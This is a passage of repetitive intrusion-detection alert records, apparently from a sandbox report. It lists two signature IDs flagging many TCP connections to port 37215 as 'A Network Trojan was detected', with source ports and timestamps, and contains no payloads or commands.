          SID:2829579
          Source Port:36956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465337
          SID:2829579
          Source Port:49402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.087495
          SID:2829579
          Source Port:52294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135043
          SID:2829579
          Source Port:45924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.890939
          SID:2829579
          Source Port:36958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260696
          SID:2829579
          Source Port:56898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019266
          SID:2829579
          Source Port:50144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.058259
          SID:2835222
          Source Port:59754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800494
          SID:2835222
          Source Port:45980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108156
          SID:2829579
          Source Port:58716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017693
          SID:2835222
          Source Port:35888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.511165
          SID:2829579
          Source Port:59604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471079
          SID:2829579
          Source Port:43722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792155
          SID:2835222
          Source Port:55610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242675
          SID:2835222
          Source Port:53538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114557
          SID:2829579
          Source Port:37482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460658
          SID:2835222
          Source Port:52706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744469
          SID:2835222
          Source Port:35534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.798396
          SID:2829579
          Source Port:44618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884243
          SID:2829579
          Source Port:58012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175190
          SID:2829579
          Source Port:40816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355912
          SID:2829579
          Source Port:33512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704185
          SID:2835222
          Source Port:57484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.150914
          SID:2835222
          Source Port:49020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673806
          SID:2835222
          Source Port:48766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708876
          SID:2829579
          Source Port:58820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.456223
          SID:2829579
          Source Port:36678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.546557
          SID:2835222
          Source Port:52536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406995
          SID:2835222
          Source Port:54992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.853967
          SID:2829579
          Source Port:53058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406424
          SID:2835222
          Source Port:42852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.445020
          SID:2835222
          Source Port:53036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671383
          SID:2835222
          Source Port:45694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.057825
          SID:2835222
          Source Port:57570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403143
          SID:2829579
          Source Port:38542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191631
          SID:2829579
          Source Port:58738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405869
          SID:2835222
          Source Port:43726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747740
          SID:2829579
          Source Port:45558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446392
          SID:2835222
          Source Port:42136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667665
          SID:2835222
          Source Port:40126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.837441
          SID:2829579
          Source Port:58282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465471
          SID:2835222
          Source Port:33852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460425
          SID:2829579
          Source Port:53132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175186
          SID:2829579
          Source Port:33586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797950
          SID:2829579
          Source Port:47474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.440919
          SID:2829579
          Source Port:55810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.669612
          SID:2835222
          Source Port:58726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274161
          SID:2829579
          Source Port:46074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355335
          SID:2829579
          Source Port:52348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792754
          SID:2829579
          Source Port:49668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.892473
          SID:2829579
          Source Port:47640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407071
          SID:2835222
          Source Port:44782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800728
          SID:2835222
          Source Port:58868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729380
          SID:2829579
          Source Port:34042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891520
          SID:2829579
          Source Port:54526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471933
          SID:2835222
          Source Port:54498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467176
          SID:2829579
          Source Port:60666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.863010
          SID:2829579
          Source Port:49260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109073
          SID:2835222
          Source Port:33800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266354
          SID:2829579
          Source Port:47066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241067
          SID:2829579
          Source Port:58002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471401
          SID:2829579
          Source Port:46972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044990
          SID:2829579
          Source Port:50844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743549
          SID:2835222
          Source Port:55716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016946
          SID:2835222
          Source Port:51680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.159177
          SID:2829579
          Source Port:55028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259166
          SID:2829579
          Source Port:49558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463413
          SID:2829579
          Source Port:40152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.663678
          SID:2829579
          Source Port:57542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599530
          SID:2835222
          Source Port:49254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260552
          SID:2829579
          Source Port:58524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005597
          SID:2829579
          Source Port:45380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.015015
          SID:2829579
          Source Port:57196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542586
          SID:2835222
          Source Port:43706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042373
          SID:2835222
          Source Port:45856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799870
          SID:2829579
          Source Port:58688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461594
          SID:2835222
          Source Port:45376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884291
          SID:2829579
          Source Port:38628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912748
          SID:2829579
          Source Port:57164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467822
          SID:2835222
          Source Port:41746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237441
          SID:2835222
          Source Port:40592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554575
          SID:2829579
          Source Port:50050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.805230
          SID:2835222
          Source Port:58022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.555265
          SID:2835222
          Source Port:46076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.265961
          SID:2829579
          Source Port:52730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.175871
          SID:2829579
          Source Port:48462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.805809
          SID:2835222
          Source Port:42150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671341
          SID:2829579
          Source Port:57566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.739795
          SID:2829579
          Source Port:37110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.040355
          SID:2829579
          Source Port:46204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797211
          SID:2829579
          Source Port:35242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238470
          SID:2829579
          Source Port:39728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155284
          SID:2835222
          Source Port:54534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.159400
          SID:2829579
          Source Port:47232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.107312
          SID:2829579
          Source Port:54266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407811
          SID:2835222
          Source Port:45498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.081744
          SID:2835222
          Source Port:49114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099477
          SID:2835222
          Source Port:44588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115777
          SID:2829579
          Source Port:48236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551375
          SID:2835222
          Source Port:48904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.299660
          SID:2829579
          Source Port:60558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.703955
          SID:2835222
          Source Port:56984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709567
          SID:2829579
          Source Port:39618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.456507
          SID:2835222
          Source Port:51258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463089
          SID:2829579
          Source Port:40784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.267804
          SID:2829579
          Source Port:58368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468236
          SID:2835222
          Source Port:34920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152237
          SID:2829579
          Source Port:36196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887916
          SID:2829579
          Source Port:42584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810953
          SID:2829579
          Source Port:46888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599599
          SID:2829579
          Source Port:33156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.795323
          SID:2835222
          Source Port:56980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465287
          SID:2835222
          Source Port:49180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173348
          SID:2829579
          Source Port:47512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128053
          SID:2835222
          Source Port:60384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161582
          SID:2835222
          Source Port:38486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159163
          SID:2829579
          Source Port:35560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465437
          SID:2835222
          Source Port:47044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131115
          SID:2835222
          Source Port:46462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131712
          SID:2835222
          Source Port:59922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.892016
          SID:2835222
          Source Port:35650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897080
          SID:2829579
          Source Port:57430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.796356
          SID:2829579
          Source Port:40384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041131
          SID:2829579
          Source Port:46442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152258
          SID:2835222
          Source Port:41646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.676290
          SID:2829579
          Source Port:35658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.055370
          SID:2829579
          Source Port:46946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.243083
          SID:2835222
          Source Port:57728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808044
          SID:2829579
          Source Port:55378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157134
          SID:2835222
          Source Port:37078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406153
          SID:2829579
          Source Port:56554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018636
          SID:2829579
          Source Port:41520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449219
          SID:2829579
          Source Port:50310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.126044
          SID:2835222
          Source Port:55440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.547383
          SID:2829579
          Source Port:57944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351071
          SID:2829579
          Source Port:51734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782704
          SID:2829579
          Source Port:44428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741399
          SID:2829579
          Source Port:58940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602811
          SID:2829579
          Source Port:36630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.150249
          SID:2829579
          Source Port:53612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240358
          SID:2835222
          Source Port:38954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.180702
          SID:2829579
          Source Port:49236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.036223
          SID:2835222
          Source Port:43414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159526
          SID:2829579
          Source Port:52128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509146
          SID:2835222
          Source Port:54704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.744044
          SID:2835222
          Source Port:45184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175552
          SID:2835222
          Source Port:44426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668253
          SID:2829579
          Source Port:60140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891753
          SID:2835222
          Source Port:37606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449292
          SID:2835222
          Source Port:46020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038881
          SID:2835222
          Source Port:32788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600120
          SID:2829579
          Source Port:37940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.606000
          SID:2829579
          Source Port:54530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466078
          SID:2829579
          Source Port:55298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356766
          SID:2829579
          Source Port:38376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353077
          SID:2829579
          Source Port:38550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495775
          SID:2829579
          Source Port:60838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465762
          SID:2835222
          Source Port:50296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406348
          SID:2829579
          Source Port:60884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114065
          SID:2835222
          Source Port:49346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014487
          SID:2829579
          Source Port:47978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.150863
          SID:2835222
          Source Port:45470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354745
          SID:2829579
          Source Port:45870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.156108
          SID:2829579
          Source Port:38988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461395
          SID:2829579
          Source Port:35794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800771
          SID:2829579
          Source Port:38104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732605
          SID:2835222
          Source Port:43220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.853069
          SID:2829579
          Source Port:35558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.893862
          SID:2829579
          Source Port:60590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911255
          SID:2835222
          Source Port:54506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159629
          SID:2835222
          Source Port:56580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896616
          SID:2829579
          Source Port:38896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.895846
          SID:2835222
          Source Port:36026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549236
          SID:2829579
          Source Port:58100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264532
          SID:2829579
          Source Port:48998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.514604
          SID:2829579
          Source Port:59626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041067
          SID:2835222
          Source Port:50464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599623
          SID:2829579
          Source Port:40484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746926
          SID:2835222
          Source Port:43234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729572
          SID:2835222
          Source Port:52986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.166723
          SID:2835222
          Source Port:55588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.515535
          SID:2829579
          Source Port:41870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.811029
          SID:2829579
          Source Port:36166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.166431
          SID:2829579
          Source Port:34036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796260
          SID:2829579
          Source Port:48364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510822
          SID:2829579
          Source Port:44310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741883
          SID:2829579
          Source Port:54904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448684
          SID:2835222
          Source Port:55868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548741
          SID:2829579
          Source Port:59706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.150772
          SID:2835222
          Source Port:38070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.166581
          SID:2835222
          Source Port:33808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729243
          SID:2835222
          Source Port:34798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730628
          SID:2829579
          Source Port:45192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266408
          SID:2829579
          Source Port:55204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159812
          SID:2829579
          Source Port:52974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.663749
          SID:2829579
          Source Port:40160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114097
          SID:2829579
          Source Port:42980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127471
          SID:2829579
          Source Port:49306
          Destination Port:37215
